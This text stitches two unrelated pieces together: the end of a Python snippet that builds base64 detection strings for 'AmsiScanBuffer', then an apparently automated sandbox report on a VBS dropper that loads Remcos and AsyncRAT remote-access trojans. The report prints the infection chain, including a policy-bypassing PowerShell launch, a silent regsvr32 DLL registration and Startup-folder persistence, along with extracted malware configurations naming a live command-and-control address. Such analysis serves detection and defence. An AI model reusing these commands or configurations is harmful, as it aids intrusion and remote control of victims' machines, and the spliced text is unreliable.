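BLOB = base64.b64encode(b"X" + b"AmsiScanBuffer" + b"\x00more data")
BLOB_NUL = base64.b64encode(b"AmsiScanBuffer\x00")
BLOB_Z = base64.b64encode(b"AmsiScanBufferZ")

if __name__ == "__main__":
    for name, text in decode_page_fragments().items():
        print(f"{name}: {text!r}")
    print(b64_variants(b"AmsiScanBuffer"))
    print(find_b64_encoded(BLOB, b"AmsiScanBuffer"))
```

The alignment-free spelling for offset 0 is `QW1zaVNjYW5CdWZmZX`, one character shorter than the rule's string; the rule's extra `I` buys precision at the cost of missing a string followed by a byte of 0x40 or above.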

        System Summary

        barindex
Source: Registry Key set | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Details: C:\Users\user\AppData\Local\Temp\dynwrapx.dll, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\regsvr32.exe, ProcessId: 3128, TargetObject: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\(Default)
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 139.99.133.66, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\winhlp32.exe, Initiated: true, ProcessId: 3252, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49715
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , ProcessId: 6640, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs" , ProcessId: 6640, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ProcessId: 4820, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", ProcessId: 380, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll", CommandLine: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5144, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll", ProcessId: 3128, ProcessName: regsvr32.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6640, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs", ProcessId: 380, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' , ProcessId: 4820, ProcessName: powershell.exe

        Data Obfuscation

        barindex
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6640, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs

Snort IDS alerts:
  Timestamp: 04/24/24-17:04:24.767265 | SID: 2032777 | Source Port: 4444 | Destination Port: 49715 | Protocol: TCP | Classtype: A Network Trojan was detected
  Timestamp: 04/24/24-17:04:24.390969 | SID: 2032776 | Source Port: 49715 | Destination Port: 4444 | Protocol: TCP | Classtype: A Network Trojan was detected
  Timestamp: 04/24/24-17:04:03.847489 | SID: 2848152 | Source Port: 6666 | Destination Port: 49704 | Protocol: TCP | Classtype: A Network Trojan was detected

        AV Detection

        barindex
Source: lmg1_Mlakaifa443456.vbs | Avira: detected
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "139.99.133.66:4444:0", "Assigned name": "ADFLY", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "asasasas-SEG6JT", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: 2.2.wscript.exe.5ed0000.2.raw.unpack | Malware Configuration Extractor: AsyncRAT {"Ports": ["6666"], "Server": ["139.99.133.66"], "Mutex": "MIGUELANGELES", "Certificate": "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", "Server Signature": "N3pZ2YCPJotv4dO0p9r4yZEeDnvpp9s/wXezrLSSJXN20FTY+KcXcOXJBRQV13FUX0FmBygTW0WXV3x9TGBjM7Nv//rhhRRRW37HV7bBW576W+8wt5cQpEzjMa5sPAAojC48387uRm7G9EfI2GVf5h3nL8PFY9Kvhbt1sQWDbvI="}
Source: C:\Users\user\AppData\Local\Temp\dynwrapx.dll | ReversingLabs: Detection: 45%
Source: lmg1_Mlakaifa443456.vbs | ReversingLabs: Detection: 26%
Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR
Source: C:\Windows\winhlp32.exe | Code function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00433837
Source: C:\Windows\winhlp32.exe | Code function: 19_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_00433837
Source: C:\Windows\winhlp32.exe | Code function: 21_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,21_2_00433837
Source: C:\Windows\winhlp32.exe | Code function: 23_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,23_2_00433837
Source: C:\Windows\winhlp32.exe | Code function: 27_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,27_2_00433837
Source: winhlp32.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

        Exploits

        barindex
Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

        Privilege Escalation

        Source: C:\Windows\winhlp32.exe | Code function: 17_2_004074FD _wcslen,CoGetObject
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_004074FD _wcslen,CoGetObject
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_004074FD _wcslen,CoGetObject
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_004074FD _wcslen,CoGetObject
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_004074FD _wcslen,CoGetObject
        Source: Binary string: C:\Users\28718\Documents\GitHub\DcRat\Binaries\Release\Plugins\SendFile.pdb source: RegAsm.exe, 00000004.00000002.3319084811.0000000005F20000.00000004.08000000.00040000.00000000.sdmp
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0044E879 FindFirstFileExA
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040783C FindFirstFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\SysWOW64\wscript.exe | File opened: C:\Users\user\AppData

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

        Networking

        Source: Traffic | Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 139.99.133.66:6666 -> 192.168.2.5:49704
        Source: Traffic | Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49715 -> 139.99.133.66:4444
        Source: Traffic | Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 139.99.133.66:4444 -> 192.168.2.5:49715
        Source: Malware configuration extractor | URLs: 139.99.133.66
        Source: Initial file: BinaryStream.SaveToFile FILE_NAME
        Source: global traffic | TCP traffic: 192.168.2.5:49704 -> 139.99.133.66:6666
        Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
        Source: Joe Sandbox View | IP Address: 178.237.33.50
        Source: Joe Sandbox View | ASN Name: OVHFR
        Source: unknown | TCP traffic detected without corresponding DNS query: 139.99.133.66
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
        Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
        Source: RegAsm.exe, 00000004.00000002.3306976580.0000000001121000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: RegAsm.exe, 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enqN
        Source: winhlp32.exe | String found in binary or memory: http://geoplugin.net/json.gp
        Source: RegAsm.exe, 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: Yara match | File source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
